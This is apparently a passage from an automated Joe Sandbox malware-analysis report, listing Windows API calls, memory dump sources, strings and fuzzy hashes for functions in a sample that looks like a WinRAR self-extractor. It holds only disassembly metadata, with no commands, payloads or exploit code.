                        • WriteFile.KERNEL32(?,?,00000000,00C91B62,00000000,?,?,?,?,?,?,?,?,?,00C91B62,?), ref: 00C9150A
                        • WriteFile.KERNEL32(?,?,00000001,00C91B62,00000000,?,?,?,?,?,?,?,?,?,00C91B62,?), ref: 00C91543
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: 2463198b58545e3113155ecb69152a458399af741e627f6261b62201e5b7c6be
                        • Instruction ID: e5c2f632f2f6cf4e8d421693de85dd5e1fa8c128c671497f1684254314ee36de
                        • Opcode Fuzzy Hash: 2463198b58545e3113155ecb69152a458399af741e627f6261b62201e5b7c6be
                        • Instruction Fuzzy Hash: 4E5198719002499FDF11CFA8D84ABEEBBF4FF49300F19419AE956E7251E7309A41CBA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _strlen$_swprintf_wcschr_wcsrchr
                        • String ID: %08x
                        • API String ID: 1593746830-3682738293
                        • Opcode ID: 862a48f151f8025f07fe9a09c2bb82bea868d5056f5769776f023ee6ee44235b
                        • Instruction ID: 617d38e3a79f8dcf0989fb1137ed0fa27af2726fce183cea1b44d3ab289672ce
                        • Opcode Fuzzy Hash: 862a48f151f8025f07fe9a09c2bb82bea868d5056f5769776f023ee6ee44235b
                        • Instruction Fuzzy Hash: B1415B729043846ADB35A624CC4AFBB73ECEF84320F14852AF95D97192DA70DF04A362
                        APIs
                        • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00C7D63B,?), ref: 00C7CEE8
                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00C7CF09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AllocByteCharGlobalMultiWide
                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                        • API String ID: 3286310052-4209811716
                        • Opcode ID: 0226c8094b09d498a3ad74c2eda2d68679dfddf40fe633dee51fd050c6d427eb
                        • Instruction ID: 56824a2ac64dfe135907df5d722258d2350ef80d2aaa5c765d0d7f8b893059c4
                        • Opcode Fuzzy Hash: 0226c8094b09d498a3ad74c2eda2d68679dfddf40fe633dee51fd050c6d427eb
                        • Instruction Fuzzy Hash: 273126321097027ED725BB61EC8AF6F779CEF81324F14801EF519961C2EF749A0993A9
                        APIs
                        • ShowWindow.USER32(?,00000000), ref: 00C7D4EB
                        • GetWindowRect.USER32(?,?), ref: 00C7D510
                        • ShowWindow.USER32(?,00000005,?), ref: 00C7D5A7
                        • SetWindowTextW.USER32(?,00000000), ref: 00C7D5AF
                        • ShowWindow.USER32(00000000,00000005), ref: 00C7D5C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Window$Show$RectText
                        • String ID: RarHtmlClassName
                        • API String ID: 3937224194-1658105358
                        • Opcode ID: b96f602c3ac8bceb666d6f82a43f961bbb2d2ddbcdaa5271ce4317e5c9036565
                        • Instruction ID: 1ff4f6949e4ed4834d5e074b832b92d0c8c6c0566fc9ab0864424715888c1d9e
                        • Opcode Fuzzy Hash: b96f602c3ac8bceb666d6f82a43f961bbb2d2ddbcdaa5271ce4317e5c9036565
                        • Instruction Fuzzy Hash: 0C31A071105200AFCB119F64DC8DB2F7FB8EF48715F05856AF91AAA152CB30DA11CBA2
                        APIs
                          • Part of subcall function 00C8E0C1: _free.LIBCMT ref: 00C8E0EA
                        • _free.LIBCMT ref: 00C8E14B
                          • Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
                          • Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826
                        • _free.LIBCMT ref: 00C8E156
                        • _free.LIBCMT ref: 00C8E161
                        • _free.LIBCMT ref: 00C8E1B5
                        • _free.LIBCMT ref: 00C8E1C0
                        • _free.LIBCMT ref: 00C8E1CB
                        • _free.LIBCMT ref: 00C8E1D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 0eecabecddca2cb04458630b41565ebd8c72ec0f874f5171aa64c18967021957
                        • Instruction ID: 226449fd79d6e5fc4b288d2d5bc2d4b3a5c2e867e9711430c93c54d020c4e67b
                        • Opcode Fuzzy Hash: 0eecabecddca2cb04458630b41565ebd8c72ec0f874f5171aa64c18967021957
                        • Instruction Fuzzy Hash: C2114F71540B08BAEA20BBB0CC47FCB77BD9F04709F410C15F29967052EBA5B694B756
                        APIs
                        • GetLastError.KERNEL32(?,?,00C85955,00C82E38), ref: 00C8596C
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C8597A
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C85993
                        • SetLastError.KERNEL32(00000000,?,00C85955,00C82E38), ref: 00C859E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 3de8b5a208aaab418a8cfa53913f9e620df4c990b235158ddcd7eec75aaebbd6
                        • Instruction ID: f322a0487c6996026b2693248eef962e32c56cc0242fd6b72d322873b96c7593
                        • Opcode Fuzzy Hash: 3de8b5a208aaab418a8cfa53913f9e620df4c990b235158ddcd7eec75aaebbd6
                        • Instruction Fuzzy Hash: A501D432608B11EEE6253679BC89B6E2648DB4177DB20023FF1249A0E5EF914C13A358
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                        • API String ID: 0-1718035505
                        • Opcode ID: 27c31bd432865d1c06c620264fd7a800adb954397a58d88bbdff87a358d93223
                        • Instruction ID: f378be62fb107a8f98efb689210a37569e32f98730822d4e8d0ebc4e67eb32c5
                        • Opcode Fuzzy Hash: 27c31bd432865d1c06c620264fd7a800adb954397a58d88bbdff87a358d93223
                        • Instruction Fuzzy Hash: AF01D671342A211B0F312FB82C9579E27CCEA0271932C057BFDA1C3140F721C9479B98
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: e15ca834b51fb3d603fd0148c25dfb57e545bdfbbc8ffbaea748fee41214fe14
                        • Instruction ID: 58cb88de1ac29fff96ac1254766de8cce5a257e23e3d522649814b3469a47925
                        • Opcode Fuzzy Hash: e15ca834b51fb3d603fd0148c25dfb57e545bdfbbc8ffbaea748fee41214fe14
                        • Instruction Fuzzy Hash: 9121357164010ABBDB00AA11CD81F7FF77C9F90B68F55C128FD0A96246E261DE459791
                        APIs
                        • GetLastError.KERNEL32(?,?,00C872DC,?,00000000,?,00C86E7B,00000200,00000000,?), ref: 00C8B126
                        • _free.LIBCMT ref: 00C8B159
                        • _free.LIBCMT ref: 00C8B181
                        • SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B18E
                        • SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B19A
                        • _abort.LIBCMT ref: 00C8B1A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 01b6762bf09e478a698866a87b745cea5a13e19300859b4ba027a375026d3589
                        • Instruction ID: 39734f507ddd50566a1ec447fad194ba33e652c11056337e58a9ae46bfaf923e
                        • Opcode Fuzzy Hash: 01b6762bf09e478a698866a87b745cea5a13e19300859b4ba027a375026d3589
                        • Instruction Fuzzy Hash: 5FF02835100B01B6E21233746C5EF2F22298FC176CB34002AF525DA191FF208E02A37D
                        APIs
                          • Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                          • Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        • EndDialog.USER32(?,00000001), ref: 00C80731
                        • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 00C80747
                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00C80761
                        • SetDlgItemTextW.USER32(?,00000066), ref: 00C8076C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ItemText$DialogWindow
                        • String ID: RENAMEDLG
                        • API String ID: 445417207-3299779563
                        • Opcode ID: 84ff8812fda91f33e1c3b03d30d6cc0e3c4cf0b2bfca74476b15fda53d1d1296
                        • Instruction ID: 02b6ab48e43055a8da5305a844e91a966a8691b86300297e939337ad859a28bb
                        • Opcode Fuzzy Hash: 84ff8812fda91f33e1c3b03d30d6cc0e3c4cf0b2bfca74476b15fda53d1d1296
                        • Instruction Fuzzy Hash: 1B01F5325402187AE6106BB9AD49F7F7B6CE746B45F20041DF301A60D0C6A6BD099B75
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C897E9,?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002), ref: 00C89858
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C8986B
                        • FreeLibrary.KERNEL32(00000000,?,?,?,00C897E9,?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C8988E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: b55327f83424deb73f2923a3b095469f787ea960f0468d32c2c37f7c3e23516e
                        • Instruction ID: f3c0108413ebd4ac8f7a13ad0c10019ef9e4bee12741bf7510496501d1585cca
                        • Opcode Fuzzy Hash: b55327f83424deb73f2923a3b095469f787ea960f0468d32c2c37f7c3e23516e
                        • Instruction Fuzzy Hash: D0F0A431510618FBCB11AF60DC0DBAEBFB8EB45715F0402A9F805A21A0DB305A41CB94
                        APIs
                          • Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
                          • Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF
                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C74C60
                        • GetProcAddress.KERNEL32(00CA6CA0,CryptUnprotectMemory), ref: 00C74C70
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                        • API String ID: 2141747552-1753850145
                        • Opcode ID: 76ec96d534c71fcfce6fcc11a548f0e46c1a6313504ccd8c2ec6ebdb1dfcdea0
                        • Instruction ID: e197d57d57e15192bda03a4d17ad0b94b9a4b491ebcb0e9ee914cd48201be55b
                        • Opcode Fuzzy Hash: 76ec96d534c71fcfce6fcc11a548f0e46c1a6313504ccd8c2ec6ebdb1dfcdea0
                        • Instruction Fuzzy Hash: EBE046B0941F42BEDF035B34A80CB08FFA47B10B40F04C66AE06882260DBF5D061CB90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 68d3862abbfef5e514afc5c771ebf5d7b2bedac0a40d16dd23c76dbeeeae0882
                        • Instruction ID: 3142316f76cd6b64d79403b33e2b1db3d8e132f4327f0c89c72cf49ccfb4db93
                        • Opcode Fuzzy Hash: 68d3862abbfef5e514afc5c771ebf5d7b2bedac0a40d16dd23c76dbeeeae0882
                        • Instruction Fuzzy Hash: D1411732A003009FDB24EF78C885A5DB3F6EF88718F15416AE516EB391D731AE42DB85
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 00C8D7A3
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8D7C6
                          • Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8D7EC
                        • _free.LIBCMT ref: 00C8D7FF
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8D80E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 51b67f406fce8effc460150d1036b3766dc2410a97489ebf58078ec828f2dfee
                        • Instruction ID: 56f3e8023dc6ca1a1eedd02b467c86b29946e11a655fb75020579576850459ba
                        • Opcode Fuzzy Hash: 51b67f406fce8effc460150d1036b3766dc2410a97489ebf58078ec828f2dfee
                        • Instruction Fuzzy Hash: 140188726016157B2721367A5C8CD7F6F6DDAC6B58314012AF915C7184EA608E01D3F5
                        APIs
                        • GetLastError.KERNEL32(?,00000000,?,00C8AC47,00C8A91B,?,00C8B150,00000001,00000364,?,00C86E7B,00000200,00000000,?), ref: 00C8B1AB
                        • _free.LIBCMT ref: 00C8B1E0
                        • _free.LIBCMT ref: 00C8B207
                        • SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B214
                        • SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B21D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 66cf2cfadb745e9d935172071796288d3564ca75504490bc47b460cfe91cd6c7
                        • Instruction ID: a277ad4eb2ceb596b577cbff756ac1bec935ce4c9c72e622064d9f361253d02c
                        • Opcode Fuzzy Hash: 66cf2cfadb745e9d935172071796288d3564ca75504490bc47b460cfe91cd6c7
                        • Instruction Fuzzy Hash: 4501F436280A00B7A21277756C9EB2F262D9FD477C731002BF515D6293FF249E01A36D
                        APIs
                        • _free.LIBCMT ref: 00C8E070
                          • Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
                          • Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826
                        • _free.LIBCMT ref: 00C8E082
                        • _free.LIBCMT ref: 00C8E094
                        • _free.LIBCMT ref: 00C8E0A6
                        • _free.LIBCMT ref: 00C8E0B8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d6cb2e28dff69602039c0b719c7eb2e1d37923bfc16acd01a63f0dc7e86b1eaf
                        • Instruction ID: d4c175a43af9b05364a2f5826905d791ced2f385cc805452e7d4e6310691907a
                        • Opcode Fuzzy Hash: d6cb2e28dff69602039c0b719c7eb2e1d37923bfc16acd01a63f0dc7e86b1eaf
                        • Instruction Fuzzy Hash: 90F04932544214BBD630FBA8EAC6E0A77E9EA043187A50C1AF018D7540CB70FE81AB69
                        APIs
